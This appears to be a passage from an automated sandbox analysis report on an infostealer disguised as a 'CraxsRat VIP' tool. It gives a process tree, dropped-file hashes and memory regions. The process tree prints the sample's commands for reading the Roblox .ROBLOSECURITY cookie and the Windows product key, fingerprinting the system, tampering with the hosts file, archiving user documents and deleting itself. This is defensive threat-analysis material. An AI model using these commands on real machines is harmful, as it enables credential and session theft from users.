          (csc.exe and cvtres.exe spawned by PowerShell are the footprint of Add-Type compiling inline C# source; the resulting 2prs3qo5.dll is listed under Downloads)

          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2240.tmp" "c:\Users\Admin\AppData\Local\Temp\2prs3qo5\CSCD83911F452EF40B6A2A1FCF734954FE.TMP"

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"

      C:\Windows\system32\tree.com
        tree /A /F

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

      C:\Windows\system32\attrib.exe
        attrib -r C:\Windows\System32\drivers\etc\hosts
        - Drops file in Drivers directory
        - Views/modifies file attributes

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

      C:\Windows\system32\attrib.exe
        attrib +r C:\Windows\System32\drivers\etc\hosts
        - Drops file in Drivers directory
        - Views/modifies file attributes

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"

      C:\Windows\system32\tree.com
        tree /A /F

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"

      C:\Windows\system32\tree.com
        tree /A /F

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

      C:\Windows\system32\tasklist.exe
        tasklist /FO LIST
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"

      C:\Windows\system32\tree.com
        tree /A /F

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"

      C:\Windows\system32\tree.com
        tree /A /F

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"

      C:\Windows\system32\getmac.exe
        getmac

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI46242\rar.exe a -r -hp"5534" "C:\Users\Admin\AppData\Local\Temp\bodUg.zip" *"

      C:\Users\Admin\AppData\Local\Temp\_MEI46242\rar.exe
        C:\Users\Admin\AppData\Local\Temp\_MEI46242\rar.exe a -r -hp"5534" "C:\Users\Admin\AppData\Local\Temp\bodUg.zip" *
        - Executes dropped EXE

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"

      C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

      C:\Windows\System32\Wbem\WMIC.exe
        wmic os get Caption
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

      C:\Windows\System32\Wbem\WMIC.exe
        wmic computersystem get totalphysicalmemory

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

      C:\Windows\System32\Wbem\WMIC.exe
        wmic csproduct get uuid

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        - Suspicious behavior: EnumeratesProcesses

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

      C:\Windows\System32\Wbem\WMIC.exe
        wmic path win32_VideoController get name
        - Detects videocard installed

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        - Suspicious behavior: EnumeratesProcesses

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\CraxsRat.exe""

      C:\Windows\system32\PING.EXE
        ping localhost -n 3
        - Runs ping.exe

C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\z.exe
  "C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\CraxsRat VIP\z.exe"
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5:    627073ee3ca9676911bee35548eff2b8
  SHA1:   4c4b68c65e2cab9864b51167d710aa29ebdcff2e
  SHA256: 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
  SHA512: 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5:    d0a4a3b9a52b8fe3b019f6cd0ef3dad6
  SHA1:   fed70ce7834c3b97edbd078eccda1e5effa527cd
  SHA256: 21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31
  SHA512: 1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5:    29cd879180a7e7faf2379c52a629761e
  SHA1:   62f4cf5bd5d2793af6e51bf1c1f2efc4093c7b59
  SHA256: e75853618db345bf020eb19e37f655788a64ffc2409506f8469b1634cd7f1c1f
  SHA512: 479b1153fb091cda5938b780917172854655b3b662f2294fb4d83ef71dfe883ffe035510efaeff621fe8d9025e57b59c201c9f0a40a4d0216c45faaed9fec952

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5:    0ac871344dc49ae49f13f0f88acb4868
  SHA1:   5a073862375c7e79255bb0eab32c635b57a77f98
  SHA256: 688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37
  SHA512: ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

C:\Users\Admin\AppData\Local\Temp\2prs3qo5\2prs3qo5.dll
  Filesize: 4KB
  MD5:    cbd430ab2014d40088a65f385207fab0
  SHA1:   c10ea1c03a760ce55be5d725569dc5bf4eb0357e
  SHA256: 4aa0f17188453268c91f729f73267b68ea1a431c129eab4da9d0540174b41570
  SHA512: 808954273c06e8097747840fffc5d754c0d92d1cf51978ce84d7ab2fbc1a93a2081acf58ee48735a506d91f00694c94d1f0e916bd7e3521cea8582882f79f213

C:\Users\Admin\AppData\Local\Temp\RES2240.tmp
  Filesize: 1KB
  MD5:    ea321151c5d783635ff0fe5cb0a2a337
  SHA1:   183355aaf4b6b65ab06807e5f863eb688513c86b
  SHA256: ed380dfa8fcd8c24935426f337a10c5f73d0193fe04962b7e070c7984d5032cc
  SHA512: a52c615f73f741b48189e3a14309a1ce5e24e5618e006daae6f83d52748895a0220362b737e90ac9cab8402483b92652cce5824ac1bc2ecc7b394a9a7f700d25

C:\Users\Admin\AppData\Local\Temp\_MEI46242\VCRUNTIME140.dll
  Filesize: 95KB
  MD5:    f34eb034aa4a9735218686590cba2e8b
  SHA1:   2bc20acdcb201676b77a66fa7ec6b53fa2644713
  SHA256: 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
  SHA512: d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

C:\Users\Admin\AppData\Local\Temp\_MEI46242\_bz2.pyd
  Filesize: 47KB
  MD5:    fba120a94a072459011133da3a989db2
  SHA1:   6568b3e9e993c7e993a699505339bbebb5db6fb0
  SHA256: 055a93c8b127dc840ac40ca70d4b0246ac88c9cde1ef99267bbe904086e0b7d3
  SHA512: 221b5a2a9de1133e2866b39f493a822060d3fb85f8c844c116f64878b9b112e8085e61d450053d859a63450d1292c13bd7ec38b89fe2dfa6684ac94e090ec3aa

C:\Users\Admin\AppData\Local\Temp\_MEI46242\_ctypes.pyd
  Filesize: 58KB
  MD5:    31859b9a99a29127c4236968b87dbcbb
  SHA1:   29b4ee82aa026c10fe8a4f43b40cbd8ec7ea71e5
  SHA256: 644712c3475be7f02c2493d75e6a831372d01243aca61aa8a1418f57e6d0b713
  SHA512: fec3ab9ce032e02c432d714de0d764aab83917129a5e6eeca21526b03176da68da08024d676bc0032200b2d2652e6d442ca2f1ef710a7408bd198995883a943a

C:\Users\Admin\AppData\Local\Temp\_MEI46242\_decimal.pyd
  Filesize: 106KB
  MD5:    7cdc590ac9b4ffa52c8223823b648e5c
  SHA1:   c8d9233acbff981d96c27f188fcde0e98cdcb27c
  SHA256: f281bd8219b4b0655e9c3a5516fe0b36e44c28b0ac9170028dd052ca234c357c
  SHA512: 919c36be05f5f94ec84e68ecca43c7d43acb8137a043cf429a9e995643ca69c4c101775955e36c15f844f64fc303999da0cbfe5e121eb5b3ffb7d70e3cd08e0b

C:\Users\Admin\AppData\Local\Temp\_MEI46242\_hashlib.pyd
  Filesize: 35KB
  MD5:    659a5efa39a45c204ada71e1660a7226
  SHA1:   1a347593fca4f914cfc4231dc5f163ae6f6e9ce0
  SHA256: b16c0cc3baa67246d8f44138c6105d66538e54d0afb999f446cae58ac83ef078
  SHA512: 386626b3bad58b450b8b97c6ba51ce87378cddf7f574326625a03c239aa83c33f4d824d3b8856715f413cfb9238d23f802f598084dbd8c73c8f6c61275fdecb5

C:\Users\Admin\AppData\Local\Temp\_MEI46242\_lzma.pyd
  Filesize: 85KB
  MD5:    864b22495372fa4d8b18e1c535962ae2
  SHA1:   8cfaee73b7690b9731303199e3ed187b1c046a85
  SHA256: fc57bd20b6b128afa5faaac1fd0ce783031faaf39f71b58c9cacf87a16f3325f
  SHA512: 9f26fe88aca42c80eb39153708b2315a4154204fc423ca474860072dd68ccc00b7081e8adb87ef9a26b9f64cd2f4334f64bc2f732cd47e3f44f6cf9cc16fa187

C:\Users\Admin\AppData\Local\Temp\_MEI46242\_queue.pyd
  Filesize: 25KB
  MD5:    bebc7743e8af7a812908fcb4cdd39168
  SHA1:   00e9056e76c3f9b2a9baba683eaa52ecfa367edb
  SHA256: cc275b2b053410c6391339149baf5b58df121a915d18b889f184be02bedaf9bc
  SHA512: c56496c6396b8c3ec5ec52542061b2146ea80d986dfe13b0d4feb7b5953c80663e34ccd7b7ee99c4344352492be93f7d31f7830ec9ec2ca8a0c2055cb18fa8db

C:\Users\Admin\AppData\Local\Temp\_MEI46242\_socket.pyd
  Filesize: 42KB
  MD5:    49f87aec74fea76792972022f6715c4d
SHA1ed1402bb0c80b36956ec9baf750b96c7593911bd
SHA2565d8c8186df42633679d6236c1febf93db26405c1706f9b5d767feab440ea38b0
SHA512de58d69228395827547e07695f70ef98cdaf041ebaae0c3686246209254f0336a589b58d44b7776ccae24a5bc03b9dc8354c768170b1771855f342eecc5fead4
-
C:\Users\Admin\AppData\Local\Temp\_MEI46242\_sqlite3.pydFilesize
50KB
MD570a7050387359a0fab75b042256b371f
SHA15ffc6dfbaddb6829b1bfd478effb4917d42dff85
SHA256e168a1e229f57248253ead19f60802b25dc0dbc717c9776e157b8878d2ca4f3d
SHA512154fd26d4ca1e6a85e3b84ce9794a9d1ef6957c3bba280d666686a0f14aa571aaec20baa0e869a78d4669f1f28ea333c0e9e4d3ecd51b25d34e46a0ef74ee735
-
C:\Users\Admin\AppData\Local\Temp\_MEI46242\_ssl.pydFilesize
62KB
MD59a7ab96204e505c760921b98e259a572
SHA139226c222d3c439a03eac8f72b527a7704124a87
SHA256cae09bbbb12aa339fd9226698e7c7f003a26a95390c7dc3a2d71a1e540508644
SHA5120f5f58fb47379b829ee70c631b3e107cde6a69dc64e4c993fb281f2d5ada926405ce29ea8b1f4f87ed14610e18133932c7273a1aa209a0394cc6332f2aba7e58
-
C:\Users\Admin\AppData\Local\Temp\_MEI46242\base_library.zipFilesize
859KB
MD5483d9675ef53a13327e7dfc7d09f23fe
SHA12378f1db6292cd8dc4ad95763a42ad49aeb11337
SHA25670c28ec0770edefcef46fa27aaa08ba8dc22a31acd6f84cb0b99257dca1b629e
SHA512f905eb1817d7d4cc1f65e3a5a01bade761bca15c4a24af7097bc8f3f2b43b00e000d6ea23cd054c391d3fdc2f1114f2af43c8bb6d97c1a0ce747763260a864f5
-
C:\Users\Admin\AppData\Local\Temp\_MEI46242\blank.aesFilesize
72KB
MD559b41f1ebd1accf49fe22bceeffa2716
SHA1d26f1579db823e3523afeb84c1cc76e30f46f40d
SHA2566238cb5cd66070c18672b712ce76f44dda5ce733c272cc82aec73b3797bc6a42
SHA51270da542b8b58adf1e603e3bf46d2eb9dd929db112863cd9bd51cd2d6d15cb72454eecd2bb7e041909d53aa37690e82eb8e9e7b324afec150cb73581aefbd459a
-
C:\Users\Admin\AppData\Local\Temp\_MEI46242\libcrypto-1_1.dllFilesize
1.1MB
MD5bbc1fcb5792f226c82e3e958948cb3c3
SHA14d25857bcf0651d90725d4fb8db03ccada6540c3
SHA2569a36e09f111687e6b450937bb9c8aede7c37d598b1cccc1293eed2342d11cf47
SHA5123137be91f3393df2d56a3255281db7d4a4dccd6850eeb4f0df69d4c8dda625b85d5634fce49b195f3cc431e2245b8e9ba401baaa08778a467639ee4c1cc23d8d
-
C:\Users\Admin\AppData\Local\Temp\_MEI46242\libffi-7.dllFilesize
23KB
MD56f818913fafe8e4df7fedc46131f201f
SHA1bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA2563f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA5125473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639
-
C:\Users\Admin\AppData\Local\Temp\_MEI46242\libssl-1_1.dllFilesize
204KB
MD5ad0a2b4286a43a0ef05f452667e656db
SHA1a8835ca75768b5756aa2445ca33b16e18ceacb77
SHA2562af3d965863018c66c2a9a2d66072fe3657bbd0b900473b9bbdcac8091686ae1
SHA512cceb5ec1dd6d2801abbacd6112393fecbf5d88fe52db86cfc98f13326c3d3e31c042b0cc180b640d0f33681bdd9e6a355dc0fbfde597a323c8d9e88de40b37c4
-
C:\Users\Admin\AppData\Local\Temp\_MEI46242\python310.dllFilesize
1.4MB
MD54a6afa2200b1918c413d511c5a3c041c
SHA139ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3
SHA256bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da
SHA512dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20
-
C:\Users\Admin\AppData\Local\Temp\_MEI46242\rar.exeFilesize
615KB
MD59c223575ae5b9544bc3d69ac6364f75e
SHA18a1cb5ee02c742e937febc57609ac312247ba386
SHA25690341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA51257663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09
-
C:\Users\Admin\AppData\Local\Temp\_MEI46242\rarreg.keyFilesize
456B
MD54531984cad7dacf24c086830068c4abe
SHA1fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA25658209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA51200056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122
-
C:\Users\Admin\AppData\Local\Temp\_MEI46242\select.pydFilesize
25KB
MD5b6de7c98e66bde6ecffbf0a1397a6b90
SHA163823ef106e8fd9ea69af01d8fe474230596c882
SHA25684b2119ed6c33dfbdf29785292a529aabbf75139d163cfbcc99805623bb3863c
SHA5121fc26e8edc447d87a4213cb5df5d18f990bba80e5635e83193f2ae5368dd88a81fddfb4575ef4475e9bf2a6d75c5c66c8ed772496ffa761c0d8644fcf40517ca
-
C:\Users\Admin\AppData\Local\Temp\_MEI46242\sqlite3.dllFilesize
622KB
MD50c4996047b6efda770b03f8f231e39b8
SHA1dffcabcd4e950cc8ee94c313f1a59e3021a0ad48
SHA256983f31bc687e0537d6028a9a65f4825cc560bbf3cb3eb0d3c0fcc2238219b5ed
SHA512112773b83b5b4b71007f2668b0344bf45db03bbe1f97ae738615f3c4e2f8afb54b3ae095ea1131bf858ddfb1e585389658af5db56561609a154ae6bb80dc79ba
-
C:\Users\Admin\AppData\Local\Temp\_MEI46242\unicodedata.pydFilesize
289KB
MD5c697dc94bdf07a57d84c7c3aa96a2991
SHA1641106acd3f51e6db1d51aa2e4d4e79cf71dc1ab
SHA25658605600fdaafbc0052a4c1eb92f68005307554cf5ad04c226c320a1c14f789e
SHA5124f735678b7e38c8e8b693593696f9483cf21f00aea2a6027e908515aa047ec873578c5068354973786e9cfd0d25b7ab1dd6cbb1b97654f202cbb17e233247a61
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cflu1o5w.o5y.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\TestWatch.jpgFilesize
286KB
MD55f6af7531c5d09b3f3cadff952605bfa
SHA11c48e52e0230803dca3e36bf7e700146cda2c9fc
SHA25686027d6a83e528803014e9498f6a5c74194292260e5314dcfe8c81ac6b106cd1
SHA51247681038341fafbc6da6e90469f754f24966daf03ecd28a6096f16b70c5810772aea8bdce70afb3a6084a8f23f8eeeef0905227fcf9670a12fc45cc1202d8fff
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docxFilesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\BackupCopy.vssxFilesize
701KB
MD5ab32cd487c6969e4eff644f43f73b6e6
SHA19f48ca4ade620ed338fda113fb10f4df8c128bb2
SHA25689be3695883f59cf86ca9662b0242d2d96caaf7aa8717105f9fd39fd98a19fbd
SHA512688a7d0d67e432ba90dacec001afb452b9837926ec78cb6a65898876bd71d46c3a61cbc833e0fc171e865e2b54f8d2b5d58d1f5243eda322b1d1f30365424cac
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docxFilesize
11KB
MD54a8fbd593a733fc669169d614021185b
SHA1166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA5126b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\FormatSubmit.txtFilesize
892KB
MD540959297232edcf64958ebbdd6e08193
SHA1e3dbf275161688e3b5637b3acf0f216fbf76aff7
SHA2563db013090e58668301fdf4cc02df53bb9387a49171abb40224ba4b53bdeb66c6
SHA512e8a864468623b13ab9bf9b5d18bbec33c77b67614e298b0dcea661910919f50369c584bbad7c6c8ec1ab3d577641ca3b4e4c553312807d997e8569a9640df7d8
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\NewBackup.potFilesize
510KB
MD52ed51e44c19132ff764f9220c68e7508
SHA10562015951af1a68518b992b75b354cd8d001978
SHA256c5c8ca6806d57a9650f3e365f365b9ee8bbd665f9e3c5451a592016e79b709b5
SHA5121448b52aa4356640c59a38069339a225b95b3423a28d012b833765c2593a4e014bb2d199c4636aace42cc3d5ac26d5097202cc66652a132b8e0e4aa7966ac07e
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docxFilesize
11KB
MD5bfbc1a403197ac8cfc95638c2da2cf0e
SHA1634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\PopSelect.xlsxFilesize
616KB
MD52f6ab263bb3028ee49ea9d3453906444
SHA1494d035929836bcdafa4d61a43d65fbb8cafff51
SHA25657576415cf72174f0d0d29974d9a8e991b524baaf41c0cefdfe3763c4dc6f344
SHA5122ac38d91c99c193240651d46704a74160dcd16ae51e139d5c6f5c5419a07d811c43901e8265e0752ac4a67db010da331f5c1ae49a61c14d14c0f2917c852dbdd
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docxFilesize
11KB
MD53b068f508d40eb8258ff0b0592ca1f9c
SHA159ac025c3256e9c6c86165082974fe791ff9833a
SHA25607db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SendBlock.csvFilesize
1.0MB
MD5adad34f0d1b8334280c991446403ad28
SHA17f0e415e01eed5f81be7081b665c4c3d96c47bb4
SHA2562549b1f8ffa421b4b6c9942a966d5c7510a7069c665c9e171b1a94dbeb88079a
SHA5127c742ca9e2359f8159ee4b1b86fc192d682247bec5764ff07e798c4dd9bbf5e61c67d2a3644c861d4a450e6c8f615047a391e9f6665f455efa3c182f415f55d6
-
C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\ID.txtFilesize
38B
MD50c3c0008268c53113dec36791aa28e4e
SHA169e7eb04539fd562a73d22897e2af096dc0192fb
SHA2567c89b928aff5c3e9f969ef47cb5f59e0cbaac6e4fc20b3ee637a88e8a74ad3b9
SHA512693497c420eb04d528ad9786e4d6e0ab76ca00f05669ee559c42a8ec760bdb46551db4cb005c4748055d0980266bc45ad092cbb627b77f7165a6af05dff2db44
-
C:\Windows\System32\drivers\etc\hostsFilesize
2KB
MD5f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6
-
\??\c:\Users\Admin\AppData\Local\Temp\2prs3qo5\2prs3qo5.0.csFilesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
\??\c:\Users\Admin\AppData\Local\Temp\2prs3qo5\2prs3qo5.cmdlineFilesize
607B
MD5456c25a9a3005f69e6e43b639117929a
SHA14f314b5f168efffe64eaf6e26aace7d2afdd0416
SHA2568dd92ce4cd33dd5e80210b6d0e14e4263edba6cca46b996964ca1422733e08c6
SHA51215b499b13ee51eff702da71e7b8c13df9a7801d984d8df24554a09e1f2740c55bdbaf20ed95f9774aba3f3381ad7aacd18f91f671b96d39424754827e599bdfa
-
\??\c:\Users\Admin\AppData\Local\Temp\2prs3qo5\CSCD83911F452EF40B6A2A1FCF734954FE.TMPFilesize
652B
MD5922822f47978a095a90bc4c60e9c66da
SHA1b4c005bfaec615c090f9c2b372cb423317856d7e
SHA25613e6df837b7f89e4995f7e6a2775cdceacffc7c6e0ac9949f262eb8c15b28df9
SHA5124d9bc89db2966e53347127b2d8ab65444c6a1751d493c5c3a544fd2186fbeef6646eda503e7ef877f64b35216eae684132192a8fc8c3350b933f94ea62d4e0af
-
memory/928-1098-0x000002AA714F0000-0x000002AA71512000-memory.dmpFilesize
136KB
-
memory/1888-1216-0x00000120F4F20000-0x00000120F4F28000-memory.dmpFilesize
32KB
-
memory/3156-1074-0x00007FFA5A620000-0x00007FFA5A64C000-memory.dmpFilesize
176KB
-
memory/3156-1319-0x00007FFA49AF0000-0x00007FFA49F56000-memory.dmpFilesize
4.4MB
-
memory/3156-1093-0x00007FFA50DA0000-0x00007FFA50DB5000-memory.dmpFilesize
84KB
-
memory/3156-1094-0x00007FFA5E940000-0x00007FFA5E94D000-memory.dmpFilesize
52KB
-
memory/3156-1090-0x00007FFA4FAE0000-0x00007FFA4FB98000-memory.dmpFilesize
736KB
-
memory/3156-1279-0x00007FFA49AF0000-0x00007FFA49F56000-memory.dmpFilesize
4.4MB
-
memory/3156-1089-0x00007FFA48920000-0x00007FFA48C99000-memory.dmpFilesize
3.5MB
-
memory/3156-1088-0x00007FFA570B0000-0x00007FFA570DE000-memory.dmpFilesize
184KB
-
memory/3156-1084-0x00007FFA635C0000-0x00007FFA635CD000-memory.dmpFilesize
52KB
-
memory/3156-1082-0x00007FFA596B0000-0x00007FFA596C9000-memory.dmpFilesize
100KB
-
memory/3156-1078-0x00007FFA5AA20000-0x00007FFA5AA38000-memory.dmpFilesize
96KB
-
memory/3156-1080-0x00007FFA55E30000-0x00007FFA55FAA000-memory.dmpFilesize
1.5MB
-
memory/3156-1079-0x00007FFA5A440000-0x00007FFA5A45F000-memory.dmpFilesize
124KB
-
memory/3156-1050-0x00007FFA5AD90000-0x00007FFA5ADB4000-memory.dmpFilesize
144KB
-
memory/3156-1052-0x00007FFA635D0000-0x00007FFA635DF000-memory.dmpFilesize
60KB
-
memory/3156-1045-0x00007FFA49AF0000-0x00007FFA49F56000-memory.dmpFilesize
4.4MB
-
memory/3156-1505-0x00007FFA5AD90000-0x00007FFA5ADB4000-memory.dmpFilesize
144KB
-
memory/3156-1506-0x00007FFA635D0000-0x00007FFA635DF000-memory.dmpFilesize
60KB
-
memory/3156-1306-0x00007FFA5AD90000-0x00007FFA5ADB4000-memory.dmpFilesize
144KB
-
memory/3156-1507-0x00007FFA5A620000-0x00007FFA5A64C000-memory.dmpFilesize
176KB
-
memory/3156-1333-0x00007FFA42FC0000-0x00007FFA430D8000-memory.dmpFilesize
1.1MB
-
memory/3156-1334-0x00007FFA635D0000-0x00007FFA635DF000-memory.dmpFilesize
60KB
-
memory/3156-1329-0x00007FFA48920000-0x00007FFA48C99000-memory.dmpFilesize
3.5MB
-
memory/3156-1330-0x00007FFA4FAE0000-0x00007FFA4FB98000-memory.dmpFilesize
736KB
-
memory/3156-1328-0x00007FFA570B0000-0x00007FFA570DE000-memory.dmpFilesize
184KB
-
